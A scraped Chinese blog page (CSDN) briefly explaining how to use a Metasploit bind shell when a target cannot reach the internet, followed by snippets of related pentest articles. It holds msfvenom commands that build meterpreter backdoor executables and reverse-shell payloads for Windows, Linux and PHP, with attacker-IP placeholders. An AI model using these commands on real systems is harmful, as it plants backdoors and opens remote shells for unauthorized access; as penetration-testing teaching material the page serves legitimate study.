msf之正向shell的使用

最新推荐文章于 2024-05-27 18:31:29 发布
最新推荐文章于 2024-05-27 18:31:29 发布
阅读量8.7k 收藏 10
点赞数 1
分类专栏: 渗透 工具 后门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32393893/article/details/108844370
版权
渗透 同时被 3 个专栏收录
11 篇文章 0 订阅
订阅专栏
工具
8 篇文章 1 订阅
订阅专栏
后门
2 篇文章 1 订阅
订阅专栏

场景:经常使用msf生成后门文件获取shell,但是经常使用的都是反弹shell,reverse_tcp。突然之间遇到了一个场景,由于目标服务器不能出网,只能使用正向shell,这时才发现,自己对于正向shell,一无所知。

1,生成正向shell后门文件

msfvenom -p windows/meterpreter/bind_tcp -f exe -o shy.exe

2,上传到目标机器上

3.配置监听(很重要)

4,运行目标机上的后门文件,获取shell

 

1,2是正向shell,是我们去主动连接了目标机的4444端口

3 是反向shell,是目标机主动连接了我们的IP的1031端口

 

 

 

shy014
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
正向shell和反弹shell
weixin_45936149的博客
03-26 9471
正向shell反弹shell的利用场景以及使用技巧
Metasploit基本用法
Johnathan的博客
02-25 336
今天玩了一把内网渗透,其中主要用到了metasploit这款内网渗透神器。metasploit大家肯定不陌生,我也在很早之前就有接触过,但每次重新使用它时都会遗忘一些用法,因此为了方便查询我在本篇记录下metasploit神器的一些常用命令,以及内网渗透中如何使用它。 Mac下安装metasploit mac下安装metasploit比较简单,官网下载pkg安装包,直接安装即可;需要注意的是安装完成后的路径。 msfconsole路径: /opt/metasploit-framework/bin
红队攻防之特殊场景上线cs和msf
自强不息
11-18 413
倘见玉皇先跪奏:他生永不落红尘
安全攻防实战系列MSF
程序员阿飘 的博客
03-04 266
前言 在红队攻防中,我们主要在外网进行信息收集,通过cms或者其他漏洞拿到shell,之后通过免杀木马将windows或linux服务器上线到cobalt strike或msf等c2服务器,之后对内网进行信息收集并绘制网络拓扑图,进行工作组或域渗透,拿到各个网段机器的权限,远程登陆并截图证明。环境配置 从虚拟机网络来看机器描述【一>所有资源获取
【渗透测试笔记】之【内网渗透——传输层隧道(nc的使用:nc的正反向shell、bash
2401_84969915的博客
05-13 846
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
[ MSF使用实例 ] 利用永恒之黑采用正向连接 shell 获得主机权限(CVE-2020-0796)(SMBGhost)
qq_51577576的博客
10-19 1132
[ MSF使用实例 ] 利用利用SMBv3远程代码执行漏洞(SMBGhost)(CVE-2020-0796)(永恒之黑)采用正向连接 shell 获得主机权限 SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。 SMBGhost
msfvenom生成shell
向阳-Y.的博客
03-06 393
Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connec
msfconsole之制作windows木马并成功获取shell正向payload)
最新发布
2201_75387456的博客
05-27 766
还有⽐如 有⼀种情 况,⽬标处于深层⽹络,不能直接连通外⽹,也不能通过其他机器连通,因 为其他机器 防⽕墙都开着,为避免在有防⽕墙监控的情况下关闭防⽕墙⽽被发现,也只能⽤正向的⻢,然后通过开着防⽕墙的机器来进⾏端⼝的转发达到穿透的⽬的。set payload windows/x64/meterpreter/bind_tcp //生成exe时相同的协议。端⼝启⽤监听后,只会接收⼀次数据,⽆论成功或者失败,它 都不会再监听了!将生成的文件在靶机中打开,利用netstat -ano查看打开的端口。
内网渗透思路整理与工具使用
Fly_鹏程万里
06-09 3338
在企业安全对抗中,红方攻击团队经常会遇到这种情况,在企业的网络边界上获取到部分权限,比如一个web服务器的webshell,然而如何更方便的进行下一步的渗透呢?如何对内网进行渗透测试,这时就需要隧道转发技术,穿透边界防火墙、安全代理等安全设备,进行深层次的安全测试。本文的主要内容是穿透内网的各种姿势。典型的边界网络架构图利用ssh建立隧道动态端口转发原理:建立一个动态的SOCKS4/5的代理通道,...
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
E019-渗透测试常用工具-使用cobaltstrike接口来传递MSF中的shell.pdf
12-02
本课程聚焦于利用Cobalt Strike工具通过其接口传递Metasploit(MSF)中的shell。Cobalt Strike是一款高级的红队工具,广泛用于模拟攻击者的行为,而Metasploit则是一个开源的渗透测试框架,提供了大量的exploit和...
msfvenom获取shell
01-03
仅用于测试 msfvenom各平台生成木马大全: windows: msfvenom -a x86 –platform Windows -p ...msfvenom -a x86 –platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.ma
iis 6.0 CVE-2017-7269 Msf 反弹shell
01-23
iis 6.0 CVE-2017-7269 Msf 反弹shell metasploit漏洞测试利用模块
shell正向和反向
qq_46258964的博客
02-05 8495
正向shell和反向shell 正向shell:控制端主动发起连接去连接被控制端 反向shell:被控制端主动连接控制端 在实战中,大多数采用反向shell,因为正向shell有很多因素导致连接失败, 比如说硬件设备有防火墙,入侵防御系统等,还有网站防火墙,端口占用,权限不足等场景,特别是硬件设备如果你正向连接被防火墙拦截导致打草惊蛇,后期攻击相当繁琐。 反向shell:而被控制端主动向外发送的数据包通常都不会被拦截。 反向shell如下 Linux常见反向shell bash反弹shell nc -lvp
2022渗透测试-反弹shell的详细讲解
保持微笑的博客
02-07 5184
1.反弹shell简介 反弹shell是一种反向链接,与正向的ssh等不同,它是在对方电脑执行命令连接到我方的攻击模式,并且这种攻击模式必须搭配远程执行命令漏洞来使用。 2.为什么要进行反弹shell 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器,这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。 那么什么情况下正向连接不太好用了呢: 1. 某客户机中了你的网马,但是它在局域网内,你直接连接不了。 2. 它的ip
MSF 详解
m0_72125469的博客
05-19 4492
The Metasploit Framework 的简称。MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。msfvenom是msfpayload和msfencode的组合。将这两个工具集成在一个框架实例中。
MSF内网渗透实战
hackzkaq的博客
05-17 3826
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全-小熊保安 本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀. 一、MSF生成木马上线目标 1. 生成木马 使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f ex
利用 metasploit 创建反弹 shell实验
m0_68638628的博客
07-01 211
metasploit是一款开源的安全漏洞检测工具,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具,是世界上使用最多的渗透实用程序。Metaloit的设计初衷是打造成一个攻击工具开发平台,IT专业人士借助其识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。
msfvenom生成后门程序及利用
good good study
04-08 7173
msfvenom
msf 正向shell
09-19
msf正向shell是Metasploit框架中的一种功能,它可以用于远程连接到目标系统,并在目标系统上执行命令或进行各种攻击行为。正向shell通过在目标系统上运行一个payload并监听指定的IP地址和端口,使攻击者可以与目标系统建立连接并执行操作。 具体来说,使用msfvenom工具生成一个正向shell payload,然后将其发送给目标系统。一旦目标系统运行了该payload,它会与攻击者指定的IP地址和端口建立连接,从而提供一个交互式的shell环境,攻击者可以利用该环境执行各种命令和攻击。 对于Linux系统,可以使用如下命令生成正向shell payload: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<你的IP地址> LPORT=<你的端口号> -f elf -o shell 对于PHP网站,可以使用如下命令生成正向shell payload: msfvenom -p php/meterpreter_reverse_tcp LHOST=<你的IP地址> LPORT=<你的端口号> -f raw > shell.php 生成payload后,可以使用不同的方式将其发送给目标系统,如通过邮件、社交工程或其他攻击手法。一旦目标系统运行了该payload,攻击者就可以使用Metasploit框架中的相关工具与目标系统建立连接并执行自己的操作。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值